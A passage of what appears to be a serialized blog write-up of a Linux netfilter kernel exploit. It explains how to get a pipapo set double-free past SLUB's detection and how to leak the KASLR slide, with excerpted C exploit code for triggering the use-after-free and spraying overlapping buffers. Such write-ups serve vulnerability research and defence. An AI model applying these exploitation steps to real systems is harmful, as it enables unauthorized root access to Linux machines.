detection",{"type":27,"tag":36,"props":61444,"children":61445},{},[61446,61448,61454,61456,61462],{"type":33,"value":61447},"The SLUB allocator has a naive double-free detection mechanism to spot straightforward sequences, such as the same object being added to the free-list twice in a row without any other objects being added in between.\nAs we have seen, ",{"type":27,"tag":84,"props":61449,"children":61451},{"className":61450},[],[61452],{"type":33,"value":61453},"nft_set_pipapo_match_destroy",{"type":33,"value":61455}," iterates over the ",{"type":27,"tag":84,"props":61457,"children":61459},{"className":61458},[],[61460],{"type":33,"value":61461},"setelems",{"type":33,"value":61463}," in the set and frees each of them, so it should be relatively simple to avoid detection by having more than one element in the set, in which case the following will happen:",{"type":27,"tag":12719,"props":61465,"children":61466},{},[61467,61472,61477,61482],{"type":27,"tag":1232,"props":61468,"children":61469},{},[61470],{"type":33,"value":61471},"Element A gets freed",{"type":27,"tag":1232,"props":61473,"children":61474},{},[61475],{"type":33,"value":61476},"Element B gets free",{"type":27,"tag":1232,"props":61478,"children":61479},{},[61480],{"type":33,"value":61481},"Element A gets freed again (double-free)",{"type":27,"tag":1232,"props":61483,"children":61484},{},[61485],{"type":33,"value":61486},"Element B gets freed again (double-free)",{"type":27,"tag":101,"props":61488,"children":61490},{"className":8877,"code":61489,"language":8876,"meta":7,"style":7},"[...]\nstatic void trigger_uaf(struct mnl_socket *nl, size_t size, int *msgqids)\n{\n[...]\n // TRANSACTION 2\n[...]\n\n // create pipapo set\n uint8_t desc[2] = {16, 16};\n set = create_set(\n batch, seq++, exploit_table_name, \"pwn_set\", 0x1337,\n NFT_SET_INTERVAL | NFT_SET_OBJECT | NFT_SET_CONCAT, KEY_LEN, 2, &desc, NULL, 0, NFT_OBJECT_CT_EXPECT);\n\n // commit 2 elems to set (elems A and B that will be double-freed)\n for (int i = 0; i \u003C 2; i++)\n {\n elem[i] = nftnl_set_elem_alloc();\n memset(key, 0x41 + i, KEY_LEN);\n nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n nftnl_set_elem_set(elem[i], NFTNL_SET_ELEM_USERDATA, &udata_buf, size);\n nftnl_set_elem_add(set, elem[i]);\n }\n[...]\n\n // TRANSACTION 3\n[...]\n set = nftnl_set_alloc();\n nftnl_set_set_u32(set, NFTNL_SET_FAMILY, family);\n nftnl_set_set_str(set, NFTNL_SET_TABLE, exploit_table_name);\n nftnl_set_set_str(set, NFTNL_SET_NAME, \"pwn_set\");\n\n // make priv->dirty true\n memset(key, 0xff, KEY_LEN);\n elem[3] = nftnl_set_elem_alloc();\n nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_OBJREF, \"pwnobj\", 7);\n nftnl_set_elem_set(elem[3], NFTNL_SET_ELEM_KEY, &key, KEY_LEN);\n nftnl_set_elem_add(set, elem[3]);\n[...]\n\n // double-free commited elems\n[...]\n nftnl_set_free(set);\n}\n[...]\n",[61491],{"type":27,"tag":84,"props":61492,"children":61493},{"__ignoreMap":7},[61494,61501,61562,61569,61576,61584,61591,61598,61606,61630,61651,61685,61746,61753,61761,61813,61820,61846,61873,61911,61940,61969,61991,61998,62005,62012,62020,62027,62035,62048,62061,62081,62088,62096,62118,62150,62195,62231,62259,62266,62273,62281,62288,62304,62311],{"type":27,"tag":207,"props":61495,"children":61496},{"class":209,"line":210},[61497],{"type":27,"tag":207,"props":61498,"children":61499},{"style":238},[61500],{"type":33,"value":17595},{"type":27,"tag":207,"props":61502,"children":61503},{"class":209,"line":244},[61504,61509,61513,61518,61522,61527,61531,61536,61541,61545,61549,61553,61558],{"type":27,"tag":207,"props":61505,"children":61506},{"style":238},[61507],{"type":33,"value":61508},"static void trigger_uaf(",{"type":27,"tag":207,"props":61510,"children":61511},{"style":214},[61512],{"type":33,"value":16677},{"type":27,"tag":207,"props":61514,"children":61515},{"style":8920},[61516],{"type":33,"value":61517}," mnl_socket",{"type":27,"tag":207,"props":61519,"children":61520},{"style":214},[61521],{"type":33,"value":17093},{"type":27,"tag":207,"props":61523,"children":61524},{"style":220},[61525],{"type":33,"value":61526},"nl",{"type":27,"tag":207,"props":61528,"children":61529},{"style":238},[61530],{"type":33,"value":1123},{"type":27,"tag":207,"props":61532,"children":61533},{"style":214},[61534],{"type":33,"value":61535},"size_t",{"type":27,"tag":207,"props":61537,"children":61538},{"style":220},[61539],{"type":33,"value":61540}," size",{"type":27,"tag":207,"props":61542,"children":61543},{"style":238},[61544],{"type":33,"value":1123},{"type":27,"tag":207,"props":61546,"children":61547},{"style":214},[61548],{"type":33,"value":26317},{"type":27,"tag":207,"props":61550,"children":61551},{"style":214},[61552],{"type":33,"value":17093},{"type":27,"tag":207,"props":61554,"children":61555},{"style":220},[61556],{"type":33,"value":61557},"msgqids",{"type":27,"tag":207,"props":61559,"children":61560},{"style":238},[61561],{"type":33,"value":10449},{"type":27,"tag":207,"props":61563,"children":61564},{"class":209,"line":270},[61565],{"type":27,"tag":207,"props":61566,"children":61567},{"style":238},[61568],{"type":33,"value":18158},{"type":27,"tag":207,"props":61570,"children":61571},{"class":209,"line":296},[61572],{"type":27,"tag":207,"props":61573,"children":61574},{"style":238},[61575],{"type":33,"value":17595},{"type":27,"tag":207,"props":61577,"children":61578},{"class":209,"line":445},[61579],{"type":27,"tag":207,"props":61580,"children":61581},{"style":238},[61582],{"type":33,"value":61583}," // TRANSACTION 2\n",{"type":27,"tag":207,"props":61585,"children":61586},{"class":209,"line":867},[61587],{"type":27,"tag":207,"props":61588,"children":61589},{"style":238},[61590],{"type":33,"value":17595},{"type":27,"tag":207,"props":61592,"children":61593},{"class":209,"line":892},[61594],{"type":27,"tag":207,"props":61595,"children":61596},{"emptyLinePlaceholder":19},[61597],{"type":33,"value":2062},{"type":27,"tag":207,"props":61599,"children":61600},{"class":209,"line":1475},[61601],{"type":27,"tag":207,"props":61602,"children":61603},{"style":238},[61604],{"type":33,"value":61605}," // create pipapo set\n",{"type":27,"tag":207,"props":61607,"children":61608},{"class":209,"line":2065},[61609,61614,61618,61622,61626],{"type":27,"tag":207,"props":61610,"children":61611},{"style":238},[61612],{"type":33,"value":61613}," uint8_t desc[2] = {",{"type":27,"tag":207,"props":61615,"children":61616},{"style":232},[61617],{"type":33,"value":3070},{"type":27,"tag":207,"props":61619,"children":61620},{"style":238},[61621],{"type":33,"value":1123},{"type":27,"tag":207,"props":61623,"children":61624},{"style":232},[61625],{"type":33,"value":3070},{"type":27,"tag":207,"props":61627,"children":61628},{"style":238},[61629],{"type":33,"value":23852},{"type":27,"tag":207,"props":61631,"children":61632},{"class":209,"line":2092},[61633,61638,61642,61647],{"type":27,"tag":207,"props":61634,"children":61635},{"style":238},[61636],{"type":33,"value":61637}," set ",{"type":27,"tag":207,"props":61639,"children":61640},{"style":226},[61641],{"type":33,"value":10380},{"type":27,"tag":207,"props":61643,"children":61644},{"style":1335},[61645],{"type":33,"value":61646}," create_set",{"type":27,"tag":207,"props":61648,"children":61649},{"style":238},[61650],{"type":33,"value":9090},{"type":27,"tag":207,"props":61652,"children":61653},{"class":209,"line":2130},[61654,61659,61663,61668,61673,61677,61681],{"type":27,"tag":207,"props":61655,"children":61656},{"style":238},[61657],{"type":33,"value":61658}," batch, seq",{"type":27,"tag":207,"props":61660,"children":61661},{"style":226},[61662],{"type":33,"value":4713},{"type":27,"tag":207,"props":61664,"children":61665},{"style":238},[61666],{"type":33,"value":61667},", exploit_table_name, ",{"type":27,"tag":207,"props":61669,"children":61670},{"style":1325},[61671],{"type":33,"value":61672},"\"pwn_set\"",{"type":27,"tag":207,"props":61674,"children":61675},{"style":238},[61676],{"type":33,"value":1123},{"type":27,"tag":207,"props":61678,"children":61679},{"style":232},[61680],{"type":33,"value":50748},{"type":27,"tag":207,"props":61682,"children":61683},{"style":238},[61684],{"type":33,"value":1842},{"type":27,"tag":207,"props":61686,"children":61687},{"class":209,"line":2168},[61688,61693,61697,61702,61706,61711,61715,61719,61723,61728,61733,61737,61741],{"type":27,"tag":207,"props":61689,"children":61690},{"style":238},[61691],{"type":33,"value":61692}," NFT_SET_INTERVAL ",{"type":27,"tag":207,"props":61694,"children":61695},{"style":226},[61696],{"type":33,"value":17693},{"type":27,"tag":207,"props":61698,"children":61699},{"style":238},[61700],{"type":33,"value":61701}," NFT_SET_OBJECT ",{"type":27,"tag":207,"props":61703,"children":61704},{"style":226},[61705],{"type":33,"value":17693},{"type":27,"tag":207,"props":61707,"children":61708},{"style":238},[61709],{"type":33,"value":61710}," NFT_SET_CONCAT, KEY_LEN, ",{"type":27,"tag":207,"props":61712,"children":61713},{"style":232},[61714],{"type":33,"value":1744},{"type":27,"tag":207,"props":61716,"children":61717},{"style":238},[61718],{"type":33,"value":1123},{"type":27,"tag":207,"props":61720,"children":61721},{"style":226},[61722],{"type":33,"value":10398},{"type":27,"tag":207,"props":61724,"children":61725},{"style":238},[61726],{"type":33,"value":61727},"desc, ",{"type":27,"tag":207,"props":61729,"children":61730},{"style":214},[61731],{"type":33,"value":61732},"NULL",{"type":27,"tag":207,"props":61734,"children":61735},{"style":238},[61736],{"type":33,"value":1123},{"type":27,"tag":207,"props":61738,"children":61739},{"style":232},[61740],{"type":33,"value":1660},{"type":27,"tag":207,"props":61742,"children":61743},{"style":238},[61744],{"type":33,"value":61745},", NFT_OBJECT_CT_EXPECT);\n",{"type":27,"tag":207,"props":61747,"children":61748},{"class":209,"line":4095},[61749],{"type":27,"tag":207,"props":61750,"children":61751},{"emptyLinePlaceholder":19},[61752],{"type":33,"value":2062},{"type":27,"tag":207,"props":61754,"children":61755},{"class":209,"line":4103},[61756],{"type":27,"tag":207,"props":61757,"children":61758},{"style":4647},[61759],{"type":33,"value":61760}," // commit 2 elems to set (elems A and B that will be double-freed)\n",{"type":27,"tag":207,"props":61762,"children":61763},{"class":209,"line":4154},[61764,61768,61772,61776,61781,61785,61789,61793,61797,61801,61805,61809],{"type":27,"tag":207,"props":61765,"children":61766},{"style":376},[61767],{"type":33,"value":10321},{"type":27,"tag":207,"props":61769,"children":61770},{"style":238},[61771],{"type":33,"value":686},{"type":27,"tag":207,"props":61773,"children":61774},{"style":214},[61775],{"type":33,"value":26317},{"type":27,"tag":207,"props":61777,"children":61778},{"style":238},[61779],{"type":33,"value":61780}," i ",{"type":27,"tag":207,"props":61782,"children":61783},{"style":226},[61784],{"type":33,"value":10380},{"type":27,"tag":207,"props":61786,"children":61787},{"style":232},[61788],{"type":33,"value":4680},{"type":27,"tag":207,"props":61790,"children":61791},{"style":238},[61792],{"type":33,"value":58472},{"type":27,"tag":207,"props":61794,"children":61795},{"style":226},[61796],{"type":33,"value":9257},{"type":27,"tag":207,"props":61798,"children":61799},{"style":232},[61800],{"type":33,"value":438},{"type":27,"tag":207,"props":61802,"children":61803},{"style":238},[61804],{"type":33,"value":58502},{"type":27,"tag":207,"props":61806,"children":61807},{"style":226},[61808],{"type":33,"value":4713},{"type":27,"tag":207,"props":61810,"children":61811},{"style":238},[61812],{"type":33,"value":10449},{"type":27,"tag":207,"props":61814,"children":61815},{"class":209,"line":4203},[61816],{"type":27,"tag":207,"props":61817,"children":61818},{"style":238},[61819],{"type":33,"value":36449},{"type":27,"tag":207,"props":61821,"children":61822},{"class":209,"line":4249},[61823,61828,61833,61837,61842],{"type":27,"tag":207,"props":61824,"children":61825},{"style":220},[61826],{"type":33,"value":61827}," elem",{"type":27,"tag":207,"props":61829,"children":61830},{"style":238},[61831],{"type":33,"value":61832},"[i] ",{"type":27,"tag":207,"props":61834,"children":61835},{"style":226},[61836],{"type":33,"value":10380},{"type":27,"tag":207,"props":61838,"children":61839},{"style":1335},[61840],{"type":33,"value":61841}," nftnl_set_elem_alloc",{"type":27,"tag":207,"props":61843,"children":61844},{"style":238},[61845],{"type":33,"value":4301},{"type":27,"tag":207,"props":61847,"children":61848},{"class":209,"line":4290},[61849,61854,61859,61864,61868],{"type":27,"tag":207,"props":61850,"children":61851},{"style":1335},[61852],{"type":33,"value":61853}," memset",{"type":27,"tag":207,"props":61855,"children":61856},{"style":238},[61857],{"type":33,"value":61858},"(key, ",{"type":27,"tag":207,"props":61860,"children":61861},{"style":232},[61862],{"type":33,"value":61863},"0x41",{"type":27,"tag":207,"props":61865,"children":61866},{"style":226},[61867],{"type":33,"value":1374},{"type":27,"tag":207,"props":61869,"children":61870},{"style":238},[61871],{"type":33,"value":61872}," i, KEY_LEN);\n",{"type":27,"tag":207,"props":61874,"children":61875},{"class":209,"line":4304},[61876,61881,61885,61889,61894,61899,61903,61907],{"type":27,"tag":207,"props":61877,"children":61878},{"style":1335},[61879],{"type":33,"value":61880}," nftnl_set_elem_set",{"type":27,"tag":207,"props":61882,"children":61883},{"style":238},[61884],{"type":33,"value":1343},{"type":27,"tag":207,"props":61886,"children":61887},{"style":220},[61888],{"type":33,"value":59300},{"type":27,"tag":207,"props":61890,"children":61891},{"style":238},[61892],{"type":33,"value":61893},"[i], NFTNL_SET_ELEM_OBJREF, ",{"type":27,"tag":207,"props":61895,"children":61896},{"style":1325},[61897],{"type":33,"value":61898},"\"pwnobj\"",{"type":27,"tag":207,"props":61900,"children":61901},{"style":238},[61902],{"type":33,"value":1123},{"type":27,"tag":207,"props":61904,"children":61905},{"style":232},[61906],{"type":33,"value":1769},{"type":27,"tag":207,"props":61908,"children":61909},{"style":238},[61910],{"type":33,"value":1455},{"type":27,"tag":207,"props":61912,"children":61913},{"class":209,"line":5466},[61914,61918,61922,61926,61931,61935],{"type":27,"tag":207,"props":61915,"children":61916},{"style":1335},[61917],{"type":33,"value":61880},{"type":27,"tag":207,"props":61919,"children":61920},{"style":238},[61921],{"type":33,"value":1343},{"type":27,"tag":207,"props":61923,"children":61924},{"style":220},[61925],{"type":33,"value":59300},{"type":27,"tag":207,"props":61927,"children":61928},{"style":238},[61929],{"type":33,"value":61930},"[i], NFTNL_SET_ELEM_KEY, ",{"type":27,"tag":207,"props":61932,"children":61933},{"style":226},[61934],{"type":33,"value":10398},{"type":27,"tag":207,"props":61936,"children":61937},{"style":238},[61938],{"type":33,"value":61939},"key, KEY_LEN);\n",{"type":27,"tag":207,"props":61941,"children":61942},{"class":209,"line":5530},[61943,61947,61951,61955,61960,61964],{"type":27,"tag":207,"props":61944,"children":61945},{"style":1335},[61946],{"type":33,"value":61880},{"type":27,"tag":207,"props":61948,"children":61949},{"style":238},[61950],{"type":33,"value":1343},{"type":27,"tag":207,"props":61952,"children":61953},{"style":220},[61954],{"type":33,"value":59300},{"type":27,"tag":207,"props":61956,"children":61957},{"style":238},[61958],{"type":33,"value":61959},"[i], NFTNL_SET_ELEM_USERDATA, ",{"type":27,"tag":207,"props":61961,"children":61962},{"style":226},[61963],{"type":33,"value":10398},{"type":27,"tag":207,"props":61965,"children":61966},{"style":238},[61967],{"type":33,"value":61968},"udata_buf, size);\n",{"type":27,"tag":207,"props":61970,"children":61971},{"class":209,"line":7900},[61972,61977,61982,61986],{"type":27,"tag":207,"props":61973,"children":61974},{"style":1335},[61975],{"type":33,"value":61976}," nftnl_set_elem_add",{"type":27,"tag":207,"props":61978,"children":61979},{"style":238},[61980],{"type":33,"value":61981},"(set, ",{"type":27,"tag":207,"props":61983,"children":61984},{"style":220},[61985],{"type":33,"value":59300},{"type":27,"tag":207,"props":61987,"children":61988},{"style":238},[61989],{"type":33,"value":61990},"[i]);\n",{"type":27,"tag":207,"props":61992,"children":61993},{"class":209,"line":7909},[61994],{"type":27,"tag":207,"props":61995,"children":61996},{"style":238},[61997],{"type":33,"value":10645},{"type":27,"tag":207,"props":61999,"children":62000},{"class":209,"line":7917},[62001],{"type":27,"tag":207,"props":62002,"children":62003},{"style":238},[62004],{"type":33,"value":17595},{"type":27,"tag":207,"props":62006,"children":62007},{"class":209,"line":7926},[62008],{"type":27,"tag":207,"props":62009,"children":62010},{"emptyLinePlaceholder":19},[62011],{"type":33,"value":2062},{"type":27,"tag":207,"props":62013,"children":62014},{"class":209,"line":7934},[62015],{"type":27,"tag":207,"props":62016,"children":62017},{"style":238},[62018],{"type":33,"value":62019}," // TRANSACTION 3\n",{"type":27,"tag":207,"props":62021,"children":62022},{"class":209,"line":7943},[62023],{"type":27,"tag":207,"props":62024,"children":62025},{"style":238},[62026],{"type":33,"value":17595},{"type":27,"tag":207,"props":62028,"children":62029},{"class":209,"line":7952},[62030],{"type":27,"tag":207,"props":62031,"children":62032},{"style":238},[62033],{"type":33,"value":62034}," set = nftnl_set_alloc();\n",{"type":27,"tag":207,"props":62036,"children":62037},{"class":209,"line":7961},[62038,62043],{"type":27,"tag":207,"props":62039,"children":62040},{"style":1335},[62041],{"type":33,"value":62042}," nftnl_set_set_u32",{"type":27,"tag":207,"props":62044,"children":62045},{"style":238},[62046],{"type":33,"value":62047},"(set, NFTNL_SET_FAMILY, family);\n",{"type":27,"tag":207,"props":62049,"children":62050},{"class":209,"line":7969},[62051,62056],{"type":27,"tag":207,"props":62052,"children":62053},{"style":1335},[62054],{"type":33,"value":62055}," nftnl_set_set_str",{"type":27,"tag":207,"props":62057,"children":62058},{"style":238},[62059],{"type":33,"value":62060},"(set, NFTNL_SET_TABLE, exploit_table_name);\n",{"type":27,"tag":207,"props":62062,"children":62063},{"class":209,"line":7978},[62064,62068,62073,62077],{"type":27,"tag":207,"props":62065,"children":62066},{"style":1335},[62067],{"type":33,"value":62055},{"type":27,"tag":207,"props":62069,"children":62070},{"style":238},[62071],{"type":33,"value":62072},"(set, NFTNL_SET_NAME, ",{"type":27,"tag":207,"props":62074,"children":62075},{"style":1325},[62076],{"type":33,"value":61672},{"type":27,"tag":207,"props":62078,"children":62079},{"style":238},[62080],{"type":33,"value":1455},{"type":27,"tag":207,"props":62082,"children":62083},{"class":209,"line":7987},[62084],{"type":27,"tag":207,"props":62085,"children":62086},{"emptyLinePlaceholder":19},[62087],{"type":33,"value":2062},{"type":27,"tag":207,"props":62089,"children":62090},{"class":209,"line":7996},[62091],{"type":27,"tag":207,"props":62092,"children":62093},{"style":4647},[62094],{"type":33,"value":62095}," // make priv->dirty true\n",{"type":27,"tag":207,"props":62097,"children":62098},{"class":209,"line":8005},[62099,62104,62108,62113],{"type":27,"tag":207,"props":62100,"children":62101},{"style":1335},[62102],{"type":33,"value":62103}," memset",{"type":27,"tag":207,"props":62105,"children":62106},{"style":238},[62107],{"type":33,"value":61858},{"type":27,"tag":207,"props":62109,"children":62110},{"style":232},[62111],{"type":33,"value":62112},"0xff",{"type":27,"tag":207,"props":62114,"children":62115},{"style":238},[62116],{"type":33,"value":62117},", KEY_LEN);\n",{"type":27,"tag":207,"props":62119,"children":62120},{"class":209,"line":8013},[62121,62126,62130,62134,62138,62142,62146],{"type":27,"tag":207,"props":62122,"children":62123},{"style":220},[62124],{"type":33,"value":62125}," elem",{"type":27,"tag":207,"props":62127,"children":62128},{"style":238},[62129],{"type":33,"value":11019},{"type":27,"tag":207,"props":62131,"children":62132},{"style":232},[62133],{"type":33,"value":1735},{"type":27,"tag":207,"props":62135,"children":62136},{"style":238},[62137],{"type":33,"value":15942},{"type":27,"tag":207,"props":62139,"children":62140},{"style":226},[62141],{"type":33,"value":10380},{"type":27,"tag":207,"props":62143,"children":62144},{"style":1335},[62145],{"type":33,"value":61841},{"type":27,"tag":207,"props":62147,"children":62148},{"style":238},[62149],{"type":33,"value":4301},{"type":27,"tag":207,"props":62151,"children":62152},{"class":209,"line":8021},[62153,62158,62162,62166,62170,62174,62179,62183,62187,62191],{"type":27,"tag":207,"props":62154,"children":62155},{"style":1335},[62156],{"type":33,"value":62157}," nftnl_set_elem_set",{"type":27,"tag":207,"props":62159,"children":62160},{"style":238},[62161],{"type":33,"value":1343},{"type":27,"tag":207,"props":62163,"children":62164},{"style":220},[62165],{"type":33,"value":59300},{"type":27,"tag":207,"props":62167,"children":62168},{"style":238},[62169],{"type":33,"value":11019},{"type":27,"tag":207,"props":62171,"children":62172},{"style":232},[62173],{"type":33,"value":1735},{"type":27,"tag":207,"props":62175,"children":62176},{"style":238},[62177],{"type":33,"value":62178},"], NFTNL_SET_ELEM_OBJREF, ",{"type":27,"tag":207,"props":62180,"children":62181},{"style":1325},[62182],{"type":33,"value":61898},{"type":27,"tag":207,"props":62184,"children":62185},{"style":238},[62186],{"type":33,"value":1123},{"type":27,"tag":207,"props":62188,"children":62189},{"style":232},[62190],{"type":33,"value":1769},{"type":27,"tag":207,"props":62192,"children":62193},{"style":238},[62194],{"type":33,"value":1455},{"type":27,"tag":207,"props":62196,"children":62197},{"class":209,"line":8029},[62198,62202,62206,62210,62214,62218,62223,62227],{"type":27,"tag":207,"props":62199,"children":62200},{"style":1335},[62201],{"type":33,"value":62157},{"type":27,"tag":207,"props":62203,"children":62204},{"style":238},[62205],{"type":33,"value":1343},{"type":27,"tag":207,"props":62207,"children":62208},{"style":220},[62209],{"type":33,"value":59300},{"type":27,"tag":207,"props":62211,"children":62212},{"style":238},[62213],{"type":33,"value":11019},{"type":27,"tag":207,"props":62215,"children":62216},{"style":232},[62217],{"type":33,"value":1735},{"type":27,"tag":207,"props":62219,"children":62220},{"style":238},[62221],{"type":33,"value":62222},"], NFTNL_SET_ELEM_KEY, ",{"type":27,"tag":207,"props":62224,"children":62225},{"style":226},[62226],{"type":33,"value":10398},{"type":27,"tag":207,"props":62228,"children":62229},{"style":238},[62230],{"type":33,"value":61939},{"type":27,"tag":207,"props":62232,"children":62233},{"class":209,"line":8037},[62234,62239,62243,62247,62251,62255],{"type":27,"tag":207,"props":62235,"children":62236},{"style":1335},[62237],{"type":33,"value":62238}," nftnl_set_elem_add",{"type":27,"tag":207,"props":62240,"children":62241},{"style":238},[62242],{"type":33,"value":61981},{"type":27,"tag":207,"props":62244,"children":62245},{"style":220},[62246],{"type":33,"value":59300},{"type":27,"tag":207,"props":62248,"children":62249},{"style":238},[62250],{"type":33,"value":11019},{"type":27,"tag":207,"props":62252,"children":62253},{"style":232},[62254],{"type":33,"value":1735},{"type":27,"tag":207,"props":62256,"children":62257},{"style":238},[62258],{"type":33,"value":1919},{"type":27,"tag":207,"props":62260,"children":62261},{"class":209,"line":8046},[62262],{"type":27,"tag":207,"props":62263,"children":62264},{"style":238},[62265],{"type":33,"value":17595},{"type":27,"tag":207,"props":62267,"children":62268},{"class":209,"line":8055},[62269],{"type":27,"tag":207,"props":62270,"children":62271},{"emptyLinePlaceholder":19},[62272],{"type":33,"value":2062},{"type":27,"tag":207,"props":62274,"children":62275},{"class":209,"line":8064},[62276],{"type":27,"tag":207,"props":62277,"children":62278},{"style":238},[62279],{"type":33,"value":62280}," // double-free commited elems\n",{"type":27,"tag":207,"props":62282,"children":62283},{"class":209,"line":8072},[62284],{"type":27,"tag":207,"props":62285,"children":62286},{"style":238},[62287],{"type":33,"value":17595},{"type":27,"tag":207,"props":62289,"children":62290},{"class":209,"line":8081},[62291,62296,62300],{"type":27,"tag":207,"props":62292,"children":62293},{"style":238},[62294],{"type":33,"value":62295}," nftnl_set_free(",{"type":27,"tag":207,"props":62297,"children":62298},{"style":8920},[62299],{"type":33,"value":58258},{"type":27,"tag":207,"props":62301,"children":62302},{"style":238},[62303],{"type":33,"value":1455},{"type":27,"tag":207,"props":62305,"children":62306},{"class":209,"line":8090},[62307],{"type":27,"tag":207,"props":62308,"children":62309},{"style":238},[62310],{"type":33,"value":451},{"type":27,"tag":207,"props":62312,"children":62313},{"class":209,"line":8098},[62314],{"type":27,"tag":207,"props":62315,"children":62316},{"style":238},[62317],{"type":33,"value":17595},{"type":27,"tag":58,"props":62319,"children":62321},{"id":62320},"leaking-kaslr",[62322],{"type":33,"value":62323},"Leaking KASLR",{"type":27,"tag":36,"props":62325,"children":62326},{},[62327,62329,62335,62337,62342,62344,62350,62352,62358,62360],{"type":33,"value":62328},"Tables contain an outline user data buffer ",{"type":27,"tag":84,"props":62330,"children":62332},{"className":62331},[],[62333],{"type":33,"value":62334},"udata",{"type":33,"value":62336}," that we can both read and write. By allocating a ",{"type":27,"tag":84,"props":62338,"children":62340},{"className":62339},[],[62341],{"type":33,"value":62334},{"type":33,"value":62343}," buffer on the double-free slot and then overlapping it with an ",{"type":27,"tag":84,"props":62345,"children":62347},{"className":62346},[],[62348],{"type":33,"value":62349},"nft_object",{"type":33,"value":62351}," we can leak the ",{"type":27,"tag":84,"props":62353,"children":62355},{"className":62354},[],[62356],{"type":33,"value":62357},"->ops",{"type":33,"value":62359}," pointer, and use it to calculate the KASLR slide.\n",{"type":27,"tag":126,"props":62361,"children":62363},{"alt":57817,"src":62362},"/posts/netfilter-universal-root-1-day/kaslr.png",[],{"type":27,"tag":101,"props":62365,"children":62367},{"className":8877,"code":62366,"language":8876,"meta":7,"style":7},"[...]\n // spray 3 udata buffers to consume elems A, B and A again\n udata_spray(nl, 0xe8, 0, 3, NULL);\n\n // check if overlap happened (i.e if we have to overlapping udata buffers)\n char spray_name[16];\n char *udata[3];\n for (int i = 0; i \u003C 3; i++)\n {\n snprintf(spray_name, sizeof(spray_name), \"spray-%i\", i);\n udata[i] = getudata(nl, spray_name);\n }\n if (udata[0][0] == udata[2][0])\n {\n puts(\"[+] got duplicated table\");\n }\n\n // Replace one of the udata buffers with nft_object\n // and read it's counterpart to leak the nft_object struct\n puts(\"[*] Info leak\");\n deludata_spray(nl, 0, 1);\n wait_destroyer();\n obj_spray(nl, 0, 1, NULL, 0);\n uint64_t *fake_obj = (uint64_t *)getudata(nl, \"spray-2\");\n[...]\n",[62368],{"type":27,"tag":84,"props":62369,"children":62370},{"__ignoreMap":7},[62371,62378,62386,62421,62428,62436,62461,62488,62539,62546,62579,62605,62612,62677,62684,62705,62712,62719,62727,62735,62756,62785,62797,62841,62897],{"type":27,"tag":207,"props":62372,"children":62373},{"class":209,"line":210},[62374],{"type":27,"tag":207,"props":62375,"children":62376},{"style":238},[62377],{"type":33,"value":17595},{"type":27,"tag":207,"props":62379,"children":62380},{"class":209,"line":244},[62381],{"type":27,"tag":207,"props":62382,"children":62383},{"style":238},[62384],{"type":33,"value":62385}," // spray 3 udata buffers to consume elems A, B and A again\n",{"type":27,"tag":207,"props":62387,"children":62388},{"class":209,"line":270},[62389,62394,62398,62403,62408,62413,62417],{"type":27,"tag":207,"props":62390,"children":62391},{"style":238},[62392],{"type":33,"value":62393}," udata_spray(",{"type":27,"tag":207,"props":62395,"children":62396},{"style":8920},[62397],{"type":33,"value":61526},{"type":27,"tag":207,"props":62399,"children":62400},{"style":238},[62401],{"type":33,"value":62402},", 0",{"type":27,"tag":207,"props":62404,"children":62405},{"style":8920},[62406],{"type":33,"value":62407},"xe8",{"type":27,"tag":207,"props":62409,"children":62410},{"style":238},[62411],{"type":33,"value":62412},", 0, 3, ",{"type":27,"tag":207,"props":62414,"children":62415},{"style":8920},[62416],{"type":33,"value":61732},{"type":27,"tag":207,"props":62418,"children":62419},{"style":238},[62420],{"type":33,"value":1455},{"type":27,"tag":207,"props":62422,"children":62423},{"class":209,"line":296},[62424],{"type":27,"tag":207,"props":62425,"children":62426},{"emptyLinePlaceholder":19},[62427],{"type":33,"value":2062},{"type":27,"tag":207,"props":62429,"children":62430},{"class":209,"line":445},[62431],{"type":27,"tag":207,"props":62432,"children":62433},{"style":4647},[62434],{"type":33,"value":62435}," // check if overlap happened (i.e if we have to overlapping udata buffers)\n",{"type":27,"tag":207,"props":62437,"children":62438},{"class":209,"line":867},[62439,62444,62449,62453,62457],{"type":27,"tag":207,"props":62440,"children":62441},{"style":214},[62442],{"type":33,"value":62443}," char",{"type":27,"tag":207,"props":62445,"children":62446},{"style":220},[62447],{"type":33,"value":62448}," spray_name",{"type":27,"tag":207,"props":62450,"children":62451},{"style":238},[62452],{"type":33,"value":11019},{"type":27,"tag":207,"props":62454,"children":62455},{"style":232},[62456],{"type":33,"value":3070},{"type":27,"tag":207,"props":62458,"children":62459},{"style":238},[62460],{"type":33,"value":38834},{"type":27,"tag":207,"props":62462,"children":62463},{"class":209,"line":892},[62464,62468,62472,62476,62480,62484],{"type":27,"tag":207,"props":62465,"children":62466},{"style":214},[62467],{"type":33,"value":62443},{"type":27,"tag":207,"props":62469,"children":62470},{"style":226},[62471],{"type":33,"value":17093},{"type":27,"tag":207,"props":62473,"children":62474},{"style":220},[62475],{"type":33,"value":62334},{"type":27,"tag":207,"props":62477,"children":62478},{"style":238},[62479],{"type":33,"value":11019},{"type":27,"tag":207,"props":62481,"children":62482},{"style":232},[62483],{"type":33,"value":1735},{"type":27,"tag":207,"props":62485,"children":62486},{"style":238},[62487],{"type":33,"value":38834},{"type":27,"tag":207,"props":62489,"children":62490},{"class":209,"line":1475},[62491,62495,62499,62503,62507,62511,62515,62519,62523,62527,62531,62535],{"type":27,"tag":207,"props":62492,"children":62493},{"style":376},[62494],{"type":33,"value":10321},{"type":27,"tag":207,"props":62496,"children":62497},{"style":238},[62498],{"type":33,"value":686},{"type":27,"tag":207,"props":62500,"children":62501},{"style":214},[62502],{"type":33,"value":26317},{"type":27,"tag":207,"props":62504,"children":62505},{"style":238},[62506],{"type":33,"value":61780},{"type":27,"tag":207,"props":62508,"children":62509},{"style":226},[62510],{"type":33,"value":10380},{"type":27,"tag":207,"props":62512,"children":62513},{"style":232},[62514],{"type":33,"value":4680},{"type":27,"tag":207,"props":62516,"children":62517},{"style":238},[62518],{"type":33,"value":58472},{"type":27,"tag":207,"props":62520,"children":62521},{"style":226},[62522],{"type":33,"value":9257},{"type":27,"tag":207,"props":62524,"children":62525},{"style":232},[62526],{"type":33,"value":26369},{"type":27,"tag":207,"props":62528,"children":62529},{"style":238},[62530],{"type":33,"value":58502},{"type":27,"tag":207,"props":62532,"children":62533},{"style":226},[62534],{"type":33,"value":4713},{"type":27,"tag":207,"props":62536,"children":62537},{"style":238},[62538],{"type":33,"value"